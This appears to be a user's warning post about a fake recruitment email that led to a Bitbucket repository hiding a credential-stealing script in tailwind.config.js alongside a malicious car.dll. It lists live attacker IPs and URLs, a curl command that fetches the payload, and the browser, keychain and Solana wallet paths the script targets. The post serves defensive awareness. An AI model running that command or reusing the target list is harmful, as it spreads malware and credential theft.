Beware recruitment emails with malware infected git repos ! admin@autosquare.store scam

New update. Read at the bottom ⏬

I received this email: from sender: admin@autosquare.store

Figma design link: https://www.figma.com/design/3p7jJDw9itkYYCTi0IqAJh/AutoSquare.Store?node-id=452-7274&t=R1qT9n8hKbqg98sN-1 (looks very legit)

I replied that I am interested and asked for a job description. He replied back with:

Red Flag ! Usually companies keep their source private and a candidate gets access to it only when after video meetings and an agreement for the work required.
Some companies also require an NDA to be signed before giving access to it's source code.

The bitbucket link is: https://autosquare-admin@bitbucket.org/autosquareshop/autopart.git

A binary file caught my eye called "car.dll". Red Flag ! Never trust files that end in .exe .dll .bat .ps1 !

The virusreport scan for this binary file is: https://www.virustotal.com/gui/file/1fd921159de8ccf3c33c7ad3d52a4186c2695b858435e8e327c4d95a8d1b048a/detection
and shows 4 detections as malware, along with external network calls to this endpoints:

GET http://www.royalsevres.com/javascript/activex_patch.hwp 200
POST http://103.35.190.170/Proxy.php 200
POST https://45.8.146.93:443/proxy/Proxy.php 200

I outlined the tailwind.config.js file because I found there 2 more red flags:

• obfuscated code. No real project needs obfuscated code in this config file.
• plain code that starts the car.dll malware

I just want to raise awareness of this new type of scam.

UPDATE

I forgot to mention, the car.dll (or any .dll) malware only applies for Windows OS !
If you use Mac or Linux you should be safe from car.dll.

However you are not safe from the obfuscated js code. I tried to decode it using https://obf-io.deobfuscate.io/ but I don't understand exacly what it's doing.

It imports the following packages: fs (uses fs.readdirSync, statSync, createReadStream, copyFile, writeFileSync), os (uses os.hostname, platform, homedir, tmpdir, type), path, request, child_process.exec.

I also found this strings: .ldb, .log, Local/BraveSoftware/Brave-Browser, Local/Google/Chrome, Roaming/Opera Software/Opera Stable, Local/Microsoft/Edge, /Library/Application Support/, Firefox, solana_id.txt, /.config/solana/id.json, /AppData/, /User Data, Login Data, /Library/Keychains/login.keychain, /.local/share/keyrings/, /.mozilla/firefox/, \\.pyp\\python.exe

If I had to guess, it scans your Edge, Chrome, Firefox and Opera browser, on both Windows and Mac for local files containing the database where your passwords are stored, and searches for something related to Solana Blockchain ? Maybe it searches for your private keyfile.

It also uses curl to download a zip file:
curl -Lo "tempdir\\p.zi" "http://45.83.140.231/pdown"
From Cyprus https://iplocation.com/?ip=45.83.140.231
I downloaded and extracted the file out of curiosity and it contains the python binary and some libraries.

I also found:
POST http://45.83.140.231/uploads - where the script uploads the stolen information from your browser
GET http://45.83.140.231/client/xyz2 - another obfuscated script, in python

TL;DR

I belive that the obfuscated js snippet hidden in tailwind.config.js tries to steal your informations from your browser like your session cookies, saved passwords and solana wallet, and uploads it to 45.83.140.231
I sent an abuse report to the hosting company that owns this IP.

I found other people talking about this scam: